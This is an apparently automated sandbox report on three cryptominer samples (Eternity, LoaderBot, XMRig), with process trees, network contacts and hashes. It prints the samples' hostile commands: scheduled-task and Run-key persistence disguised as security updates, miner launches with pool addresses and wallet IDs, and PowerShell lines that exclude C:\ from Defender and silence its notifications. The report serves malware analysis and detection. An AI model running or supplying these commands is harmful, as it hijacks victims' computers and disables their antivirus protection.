memory/796-90-0x0000000140000000-0x0000000140758000-memory.dmp
memory/1296-91-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\ServiceHub\a89d4dfabf30a221b56db35ebe5b5852ad16fc8e8828d169219e97c849ec5fa9.exe
| MD5 | d5737f563015ca9df92bf17c6636db42 |
| SHA1 | 957099807b7ab2e38d583f84fb7059711feec61f |
| SHA256 | a89d4dfabf30a221b56db35ebe5b5852ad16fc8e8828d169219e97c849ec5fa9 |
| SHA512 | d160a076c6ab88634c8695ab3d9ca29e37e6a4fb43cd400d1d1047fb7da2614e3e5a537f4a10f55ee5ef3cc16d40552ea888437f72f937e824d96ef24536c518 |
Analysis: behavioral8
Detonation Overview
Submitted
2022-09-07 13:02
Reported
2022-09-07 13:06
Platform
win10v2004-20220812-en
Max time kernel
149s
Max time network
151s
Command Line
Signatures
Eternity
xmrig
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\ServiceHub\a89d4dfabf30a221b56db35ebe5b5852ad16fc8e8828d169219e97c849ec5fa9.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\ServiceHub\a89d4dfabf30a221b56db35ebe5b5852ad16fc8e8828d169219e97c849ec5fa9.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\a89d4dfabf30a221b56db35ebe5b5852ad16fc8e8828d169219e97c849ec5fa9.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 3476 set thread context of 2436 | N/A | C:\Users\Admin\AppData\Local\ServiceHub\a89d4dfabf30a221b56db35ebe5b5852ad16fc8e8828d169219e97c849ec5fa9.exe | C:\Windows\explorer.exe |
Enumerates physical storage devices
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
Runs ping.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Windows\explorer.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\a89d4dfabf30a221b56db35ebe5b5852ad16fc8e8828d169219e97c849ec5fa9.exe
"C:\Users\Admin\AppData\Local\Temp\a89d4dfabf30a221b56db35ebe5b5852ad16fc8e8828d169219e97c849ec5fa9.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C chcp 65001 && ping 127.0.0.1 && schtasks /create /tn "a89d4dfabf30a221b56db35ebe5b5852ad16fc8e8828d169219e97c849ec5fa9" /sc MINUTE /tr "C:\Users\Admin\AppData\Local\ServiceHub\a89d4dfabf30a221b56db35ebe5b5852ad16fc8e8828d169219e97c849ec5fa9.exe" /rl HIGHEST /f && DEL /F /S /Q /A "C:\Users\Admin\AppData\Local\Temp\a89d4dfabf30a221b56db35ebe5b5852ad16fc8e8828d169219e97c849ec5fa9.exe" &&START "" "C:\Users\Admin\AppData\Local\ServiceHub\a89d4dfabf30a221b56db35ebe5b5852ad16fc8e8828d169219e97c849ec5fa9.exe"
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping 127.0.0.1
C:\Windows\system32\schtasks.exe
schtasks /create /tn "a89d4dfabf30a221b56db35ebe5b5852ad16fc8e8828d169219e97c849ec5fa9" /sc MINUTE /tr "C:\Users\Admin\AppData\Local\ServiceHub\a89d4dfabf30a221b56db35ebe5b5852ad16fc8e8828d169219e97c849ec5fa9.exe" /rl HIGHEST /f
C:\Users\Admin\AppData\Local\ServiceHub\a89d4dfabf30a221b56db35ebe5b5852ad16fc8e8828d169219e97c849ec5fa9.exe
"C:\Users\Admin\AppData\Local\ServiceHub\a89d4dfabf30a221b56db35ebe5b5852ad16fc8e8828d169219e97c849ec5fa9.exe"
C:\Windows\explorer.exe
C:\Windows\explorer.exe -a cryptonight -o pool.minexmr.com:4444 -u 49vkUmVaigPGUsSL7xMRTxHbf38TkAMKFVN57A17sxUujLNgmrKi7bFcwb73uRWepASSZJPEWf1Kn81nWdHKDhEnAANFvmW.Admin_GBQHURCC -p x --max-cpu-usage=30 --donate-level=1
C:\Users\Admin\AppData\Local\ServiceHub\a89d4dfabf30a221b56db35ebe5b5852ad16fc8e8828d169219e97c849ec5fa9.exe
C:\Users\Admin\AppData\Local\ServiceHub\a89d4dfabf30a221b56db35ebe5b5852ad16fc8e8828d169219e97c849ec5fa9.exe
Network
| Country | Destination | Domain | Proto |
| US | 93.184.221.240:80 | tcp | |
| US | 93.184.220.29:80 | tcp | |
| HN | 190.107.133.19:80 | tcp | |
| US | 8.8.8.8:53 | pastebin.com | udp |
| US | 104.20.68.143:443 | pastebin.com | tcp |
| US | 8.8.8.8:53 | raw.githubusercontent.com | udp |
| US | 185.199.108.133:443 | raw.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | pool.minexmr.com | udp |
| US | 8.8.8.8:53 | pool.minexmr.com | udp |
| US | 8.8.8.8:53 | pool.minexmr.com | udp |
| US | 8.8.8.8:53 | pool.minexmr.com | udp |
| US | 8.8.8.8:53 | pool.minexmr.com | udp |
| US | 8.8.8.8:53 | pool.minexmr.com | udp |
| US | 20.189.173.7:443 | tcp | |
| US | 8.8.8.8:53 | pool.minexmr.com | udp |
| US | 8.8.8.8:53 | pool.minexmr.com | udp |
| US | 13.107.4.50:80 | tcp | |
| US | 13.107.4.50:80 | tcp | |
| US | 13.107.4.50:80 | tcp | |
| US | 8.8.8.8:53 | pool.minexmr.com | udp |
| US | 8.8.8.8:53 | pool.minexmr.com | udp |
| US | 8.8.8.8:53 | pool.minexmr.com | udp |
| US | 8.8.8.8:53 | pool.minexmr.com | udp |
| US | 8.8.8.8:53 | pool.minexmr.com | udp |
| US | 8.8.8.8:53 | pool.minexmr.com | udp |
| US | 8.8.8.8:53 | pool.minexmr.com | udp |
| US | 8.8.8.8:53 | pool.minexmr.com | udp |
| US | 8.8.8.8:53 | pool.minexmr.com | udp |
| US | 8.8.8.8:53 | pool.minexmr.com | udp |
| US | 8.8.8.8:53 | pool.minexmr.com | udp |
| US | 8.8.8.8:53 | pool.minexmr.com | udp |
| US | 8.8.8.8:53 | pool.minexmr.com | udp |
| US | 8.8.8.8:53 | pool.minexmr.com | udp |
| US | 8.8.8.8:53 | pool.minexmr.com | udp |
| US | 8.8.8.8:53 | pool.minexmr.com | udp |
| US | 8.8.8.8:53 | pool.minexmr.com | udp |
Files
memory/4544-132-0x000002419FCB0000-0x000002419FEC6000-memory.dmp
memory/4544-133-0x00007FFFDECD0000-0x00007FFFDF791000-memory.dmp
memory/532-134-0x0000000000000000-mapping.dmp
memory/4544-136-0x00007FFFDECD0000-0x00007FFFDF791000-memory.dmp
memory/4764-135-0x0000000000000000-mapping.dmp
memory/4744-137-0x0000000000000000-mapping.dmp
memory/4664-138-0x0000000000000000-mapping.dmp
memory/3476-139-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\ServiceHub\a89d4dfabf30a221b56db35ebe5b5852ad16fc8e8828d169219e97c849ec5fa9.exe
| MD5 | d5737f563015ca9df92bf17c6636db42 |
| SHA1 | 957099807b7ab2e38d583f84fb7059711feec61f |
| SHA256 | a89d4dfabf30a221b56db35ebe5b5852ad16fc8e8828d169219e97c849ec5fa9 |
| SHA512 | d160a076c6ab88634c8695ab3d9ca29e37e6a4fb43cd400d1d1047fb7da2614e3e5a537f4a10f55ee5ef3cc16d40552ea888437f72f937e824d96ef24536c518 |
C:\Users\Admin\AppData\Local\ServiceHub\a89d4dfabf30a221b56db35ebe5b5852ad16fc8e8828d169219e97c849ec5fa9.exe
| MD5 | d5737f563015ca9df92bf17c6636db42 |
| SHA1 | 957099807b7ab2e38d583f84fb7059711feec61f |
| SHA256 | a89d4dfabf30a221b56db35ebe5b5852ad16fc8e8828d169219e97c849ec5fa9 |
| SHA512 | d160a076c6ab88634c8695ab3d9ca29e37e6a4fb43cd400d1d1047fb7da2614e3e5a537f4a10f55ee5ef3cc16d40552ea888437f72f937e824d96ef24536c518 |
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\a89d4dfabf30a221b56db35ebe5b5852ad16fc8e8828d169219e97c849ec5fa9.exe.log
| MD5 | fff5cbccb6b31b40f834b8f4778a779a |
| SHA1 | 899ed0377e89f1ed434cfeecc5bc0163ebdf0454 |
| SHA256 | b8f7e4ed81764db56b9c09050f68c5a26af78d8a5e2443e75e0e1aa7cd2ccd76 |
| SHA512 | 1a188a14c667bc31d2651b220aa762be9cce4a75713217846fbe472a307c7bbc6e3c27617f75f489902a534d9184648d204d03ee956ac57b11aa90551248b8f9 |
memory/2436-143-0x0000000140000000-0x0000000140758000-memory.dmp
memory/2436-144-0x00000001402EB66C-mapping.dmp
memory/2436-145-0x0000000140000000-0x0000000140758000-memory.dmp
memory/3476-147-0x00007FFFDEB50000-0x00007FFFDF611000-memory.dmp
memory/2436-146-0x0000000140000000-0x0000000140758000-memory.dmp
memory/2436-148-0x0000000000A20000-0x0000000000A40000-memory.dmp
memory/2436-149-0x0000000140000000-0x0000000140758000-memory.dmp
memory/3476-150-0x00007FFFDEB50000-0x00007FFFDF611000-memory.dmp
memory/2436-151-0x0000000140000000-0x0000000140758000-memory.dmp
C:\Users\Admin\AppData\Local\ServiceHub\a89d4dfabf30a221b56db35ebe5b5852ad16fc8e8828d169219e97c849ec5fa9.exe
| MD5 | d5737f563015ca9df92bf17c6636db42 |
| SHA1 | 957099807b7ab2e38d583f84fb7059711feec61f |
| SHA256 | a89d4dfabf30a221b56db35ebe5b5852ad16fc8e8828d169219e97c849ec5fa9 |
| SHA512 | d160a076c6ab88634c8695ab3d9ca29e37e6a4fb43cd400d1d1047fb7da2614e3e5a537f4a10f55ee5ef3cc16d40552ea888437f72f937e824d96ef24536c518 |
memory/4312-153-0x00007FFFDEB50000-0x00007FFFDF611000-memory.dmp
memory/4312-154-0x00007FFFDEB50000-0x00007FFFDF611000-memory.dmp
Analysis: behavioral5
Detonation Overview
Submitted
2022-09-07 13:02
Reported
2022-09-07 13:06
Platform
win7-20220812-en
Max time kernel
151s
Max time network
133s
Command Line
Signatures
LoaderBot
xmrig
LoaderBot executable
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Usermode.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\setup.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-06ENU.tmp\setup.tmp | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Driver.url | C:\Users\Admin\AppData\Local\Temp\Usermode.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\61b08c9b1c1f836a8fe354ae53110ffc66ef1ecb9ea353b345d7690a0bb3be29.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\61b08c9b1c1f836a8fe354ae53110ffc66ef1ecb9ea353b345d7690a0bb3be29.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\setup.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-06ENU.tmp\setup.tmp | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-06ENU.tmp\setup.tmp | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-06ENU.tmp\setup.tmp | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Usermode.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-06ENU.tmp\setup.tmp | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-06ENU.tmp\setup.tmp | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Windows\CurrentVersion\Run\Driver = "C:\\Users\\Admin\\AppData\\Roaming\\Sysfiles\\Usermode.exe" | C:\Users\Admin\AppData\Local\Temp\Usermode.exe | N/A |
Enumerates physical storage devices
Runs ping.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: LoadsDriver
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\Usermode.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\61b08c9b1c1f836a8fe354ae53110ffc66ef1ecb9ea353b345d7690a0bb3be29.exe
"C:\Users\Admin\AppData\Local\Temp\61b08c9b1c1f836a8fe354ae53110ffc66ef1ecb9ea353b345d7690a0bb3be29.exe"
C:\Users\Admin\AppData\Local\Temp\Usermode.exe
"C:\Users\Admin\AppData\Local\Temp\Usermode.exe"
C:\Users\Admin\AppData\Local\Temp\setup.exe
"C:\Users\Admin\AppData\Local\Temp\setup.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c ping -n 3 127.0.0.1 & copy /Y "C:\Users\Admin\AppData\Local\Temp\setup.exe" "C:\Users\Admin\AppData\Local\Temp\61b08c9b1c1f836a8fe354ae53110ffc66ef1ecb9ea353b345d7690a0bb3be29.exe" >> NUL
C:\Windows\SysWOW64\PING.EXE
ping -n 3 127.0.0.1
C:\Users\Admin\AppData\Local\Temp\is-06ENU.tmp\setup.tmp
"C:\Users\Admin\AppData\Local\Temp\is-06ENU.tmp\setup.tmp" /SL5="$8011E,2411950,352768,C:\Users\Admin\AppData\Local\Temp\setup.exe"
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 86VwoTuZTDgF5trS4bcEkvXtoHhUySbTWaWD5K4chXXc6XEPtWSVJcB43EVa9fmhPwcXRDNJ1hY21QqQtH3MQShV1F4VWrX -p x -k -v=0 --donate-level=1 -t 1
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | pool.supportxmr.com | udp |
| FR | 141.94.96.195:3333 | pool.supportxmr.com | tcp |
Files
memory/1400-54-0x0000000075571000-0x0000000075573000-memory.dmp
\Users\Admin\AppData\Local\Temp\Usermode.exe
| MD5 | c08501fa8eca8770f56a14bee65ca31a |
| SHA1 | 1631125fef2594684dceed63455c7816c5ce1e46 |
| SHA256 | 226494ab0effda8f789283a4b1a4b04d719b896d6315684c3b5b7262b8906385 |
| SHA512 | 5021a7123f502ae62128e02c65def41c7f375c5abca9334719e66938b7b80d3449f2aba08b3050fb9da7972f1ab3ae6f499f0a6ba1f46f515487047d54315025 |
memory/1984-56-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\Usermode.exe
| MD5 | c08501fa8eca8770f56a14bee65ca31a |
| SHA1 | 1631125fef2594684dceed63455c7816c5ce1e46 |
| SHA256 | 226494ab0effda8f789283a4b1a4b04d719b896d6315684c3b5b7262b8906385 |
| SHA512 | 5021a7123f502ae62128e02c65def41c7f375c5abca9334719e66938b7b80d3449f2aba08b3050fb9da7972f1ab3ae6f499f0a6ba1f46f515487047d54315025 |
C:\Users\Admin\AppData\Local\Temp\Usermode.exe
| MD5 | c08501fa8eca8770f56a14bee65ca31a |
| SHA1 | 1631125fef2594684dceed63455c7816c5ce1e46 |
| SHA256 | 226494ab0effda8f789283a4b1a4b04d719b896d6315684c3b5b7262b8906385 |
| SHA512 | 5021a7123f502ae62128e02c65def41c7f375c5abca9334719e66938b7b80d3449f2aba08b3050fb9da7972f1ab3ae6f499f0a6ba1f46f515487047d54315025 |
\Users\Admin\AppData\Local\Temp\setup.exe
| MD5 | df0fd86748ba867a58e017bb2311990f |
| SHA1 | d3a4f8e7ff824d6c8dfcd4c6be6f6435ffd1337e |
| SHA256 | 716e232390346c61dd7fc36cf381a5355ff825142b3ed5d70901cd1d4dd305f4 |
| SHA512 | 097136bb69d2251de255a36aa5115ed1f27d3283110f56b41ebc0ac1783982ffa76ece756cb03e60a3b5f0dcb42d7899b8f7a3e1398fe1c7a09a3d2a491bb6eb |
memory/1984-65-0x00000000009C0000-0x0000000000E70000-memory.dmp
memory/1980-63-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\setup.exe
| MD5 | df0fd86748ba867a58e017bb2311990f |
| SHA1 | d3a4f8e7ff824d6c8dfcd4c6be6f6435ffd1337e |
| SHA256 | 716e232390346c61dd7fc36cf381a5355ff825142b3ed5d70901cd1d4dd305f4 |
| SHA512 | 097136bb69d2251de255a36aa5115ed1f27d3283110f56b41ebc0ac1783982ffa76ece756cb03e60a3b5f0dcb42d7899b8f7a3e1398fe1c7a09a3d2a491bb6eb |
C:\Users\Admin\AppData\Local\Temp\setup.exe
| MD5 | df0fd86748ba867a58e017bb2311990f |
| SHA1 | d3a4f8e7ff824d6c8dfcd4c6be6f6435ffd1337e |
| SHA256 | 716e232390346c61dd7fc36cf381a5355ff825142b3ed5d70901cd1d4dd305f4 |
| SHA512 | 097136bb69d2251de255a36aa5115ed1f27d3283110f56b41ebc0ac1783982ffa76ece756cb03e60a3b5f0dcb42d7899b8f7a3e1398fe1c7a09a3d2a491bb6eb |
memory/2020-60-0x0000000000000000-mapping.dmp
memory/984-67-0x0000000000000000-mapping.dmp
memory/2020-66-0x0000000000400000-0x0000000000460000-memory.dmp
\Users\Admin\AppData\Local\Temp\is-06ENU.tmp\setup.tmp
| MD5 | 36da68f5c3a7fe4dd3f589941160ac85 |
| SHA1 | 71c610db1bc62c9af3d23f819433a6cd89432fe8 |
| SHA256 | 95883809e3356924097775a13407a43bcf48aca640b7d795ea2ef4e2d261285e |
| SHA512 | 56c3431cab652fda44c4a102f8d16ccd7b9f96aebdb1a63bfc9c6f5e0dec99607562574f40e5e7a8666d8d5f76b6b4d8e8baef1b0629f1f64cf32786f8fb146c |
memory/564-71-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\is-06ENU.tmp\setup.tmp
| MD5 | 36da68f5c3a7fe4dd3f589941160ac85 |
| SHA1 | 71c610db1bc62c9af3d23f819433a6cd89432fe8 |
| SHA256 | 95883809e3356924097775a13407a43bcf48aca640b7d795ea2ef4e2d261285e |
| SHA512 | 56c3431cab652fda44c4a102f8d16ccd7b9f96aebdb1a63bfc9c6f5e0dec99607562574f40e5e7a8666d8d5f76b6b4d8e8baef1b0629f1f64cf32786f8fb146c |
\Users\Admin\AppData\Local\Temp\is-BRD4J.tmp\_isetup\_shfoldr.dll
| MD5 | 92dc6ef532fbb4a5c3201469a5b5eb63 |
| SHA1 | 3e89ff837147c16b4e41c30d6c796374e0b8e62c |
| SHA256 | 9884e9d1b4f8a873ccbd81f8ad0ae257776d2348d027d811a56475e028360d87 |
| SHA512 | 9908e573921d5dbc3454a1c0a6c969ab8a81cc2e8b5385391d46b1a738fb06a76aa3282e0e58d0d2ffa6f27c85668cd5178e1500b8a39b1bbae04366ae6a86d3 |
\Users\Admin\AppData\Local\Temp\is-BRD4J.tmp\_isetup\_shfoldr.dll
| MD5 | 92dc6ef532fbb4a5c3201469a5b5eb63 |
| SHA1 | 3e89ff837147c16b4e41c30d6c796374e0b8e62c |
| SHA256 | 9884e9d1b4f8a873ccbd81f8ad0ae257776d2348d027d811a56475e028360d87 |
| SHA512 | 9908e573921d5dbc3454a1c0a6c969ab8a81cc2e8b5385391d46b1a738fb06a76aa3282e0e58d0d2ffa6f27c85668cd5178e1500b8a39b1bbae04366ae6a86d3 |
\Users\Admin\AppData\Local\Temp\is-BRD4J.tmp\ISDone.dll
| MD5 | f26684a0b0999413be6751f335603471 |
| SHA1 | dcd054328740c4bbf00e11b0b8f00a00f311898d |
| SHA256 | 44e56185af5aae005e0298397e75ba0792a9cbb61341ddf07635536c62630890 |
| SHA512 | d1358b7142ca466a3ad17f09cdc283546aad9ebc454abf06f7673d46e4c5c59280d0bc673b4bdc557e3032d27aa261667de4284e9fc7d46aba64f89da807df3e |
memory/2020-78-0x0000000000400000-0x0000000000460000-memory.dmp
\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
| MD5 | 22b86c4bdd3a476351ebe051e2af9564 |
| SHA1 | 10c9928d20a1e272f58fef1a56434deabae68aa4 |
| SHA256 | fd37e08f7e809d14f9e73f802ac0a35c6cea8bfb1261504cafc660d306c21c45 |
| SHA512 | fd7e047096015472705e8127f66faa50d71f0e527a4d5b708a16f02289778c18ecd7715f35a37cdaa88a8a9c2786b369b0e23e4009be4f93a79ca0675f2ed982 |
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
| MD5 | 22b86c4bdd3a476351ebe051e2af9564 |
| SHA1 | 10c9928d20a1e272f58fef1a56434deabae68aa4 |
| SHA256 | fd37e08f7e809d14f9e73f802ac0a35c6cea8bfb1261504cafc660d306c21c45 |
| SHA512 | fd7e047096015472705e8127f66faa50d71f0e527a4d5b708a16f02289778c18ecd7715f35a37cdaa88a8a9c2786b369b0e23e4009be4f93a79ca0675f2ed982 |
memory/876-80-0x0000000000000000-mapping.dmp
memory/876-82-0x0000000000270000-0x0000000000280000-memory.dmp
memory/1984-83-0x0000000006460000-0x000000000713E000-memory.dmp
memory/876-84-0x0000000140000000-0x0000000140CDE000-memory.dmp
memory/564-87-0x0000000002100000-0x000000000210F000-memory.dmp
\Users\Admin\AppData\Local\Temp\is-BRD4J.tmp\botva2.dll
| MD5 | 67965a5957a61867d661f05ae1f4773e |
| SHA1 | f14c0a4f154dc685bb7c65b2d804a02a0fb2360d |
| SHA256 | 450b9b0ba25bf068afbc2b23d252585a19e282939bf38326384ea9112dfd0105 |
| SHA512 | c6942818b9026dc5db2d62999d32cf99fe7289f79a28b8345af17acf9d13b2229a5e917a48ff1f6d59715bdbcb00c1625e0302abcfe10ca7e0475762e0a3f41b |
\Users\Admin\AppData\Local\Temp\is-BRD4J.tmp\b2p.dll
| MD5 | ab35386487b343e3e82dbd2671ff9dab |
| SHA1 | 03591d07aea3309b631a7d3a6e20a92653e199b8 |
| SHA256 | c3729545522fcff70db61046c0efd962df047d40e3b5ccd2272866540fc872b2 |
| SHA512 | b67d7384c769b2b1fdd3363fc3b47d300c2ea4d37334acfd774cf29169c0a504ba813dc3ecbda5b71a3f924110a77a363906b16a87b4b1432748557567d1cf09 |
memory/564-88-0x0000000073380000-0x0000000073391000-memory.dmp
memory/876-89-0x0000000000000000-0x0000000001000000-memory.dmp
memory/1984-90-0x0000000006460000-0x000000000713E000-memory.dmp
memory/876-91-0x0000000140000000-0x0000000140CDE000-memory.dmp
Analysis: behavioral10
Detonation Overview
Submitted
2022-09-07 13:02
Reported
2022-09-07 13:06
Platform
win10v2004-20220901-en
Max time kernel
152s
Max time network
150s
Command Line
Signatures
xmrig
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\WinSec.exe | N/A |
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce | C:\Users\Admin\AppData\Local\Temp\bb1e9db6d9b4b5a858987999a1c8b68ea3610382968c36771da27a6625eba776.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" | C:\Users\Admin\AppData\Local\Temp\bb1e9db6d9b4b5a858987999a1c8b68ea3610382968c36771da27a6625eba776.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Windows Security Update = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Windows Security Update\\WinSec.exe" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 4540 set thread context of 2072 | N/A | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\WinSec.exe | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: LoadsDriver
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\WinSec.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\WinSec.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\bb1e9db6d9b4b5a858987999a1c8b68ea3610382968c36771da27a6625eba776.exe
"C:\Users\Admin\AppData\Local\Temp\bb1e9db6d9b4b5a858987999a1c8b68ea3610382968c36771da27a6625eba776.exe"
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\WinSec.exe
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\WinSec.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" Set-MpPreference -PUAProtection 1
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" Set-ItemProperty -Path 'HKLM:\\SOFTWARE\\Microsoft\\Windows Defender Security Center\\Notifications' -Name DisableNotifications -Value 1
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" Add-MpPreference -ExclusionPath C:\
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Remove-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'Windows Security Update';New-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'Windows Security Update' -Value '"C:\Users\Admin\AppData\Local\Temp\Windows Security Update\WinSec.exe"' -PropertyType 'String'
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe --donate-level 0 --max-cpu-usage 50 -o pool.supportxmr.com:3333 -u 4774bMmQt7g8FfWNP1K51Tdy7v5DS2ZRYarJcEmpy8rAXnuycfKGerFdEawGvgHUnCePRxky732gfcowXbXHcwT69rhLT5w.rig16
Network
| Country | Destination | Domain | Proto |
| US | 209.197.3.8:80 | tcp | |
| FR | 2.18.109.224:443 | tcp | |
| US | 8.8.8.8:53 | cdn.discordapp.com | udp |
| US | 162.159.130.233:443 | cdn.discordapp.com | tcp |
| US | 8.8.8.8:53 | pool.supportxmr.com | udp |
| FR | 141.94.96.71:3333 | pool.supportxmr.com | tcp |
| US | 209.197.3.8:80 | tcp | |
| US | 209.197.3.8:80 | tcp |
Files
memory/4540-132-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\WinSec.exe
| MD5 | a419d5d9882f43143818df7122c684a1 |
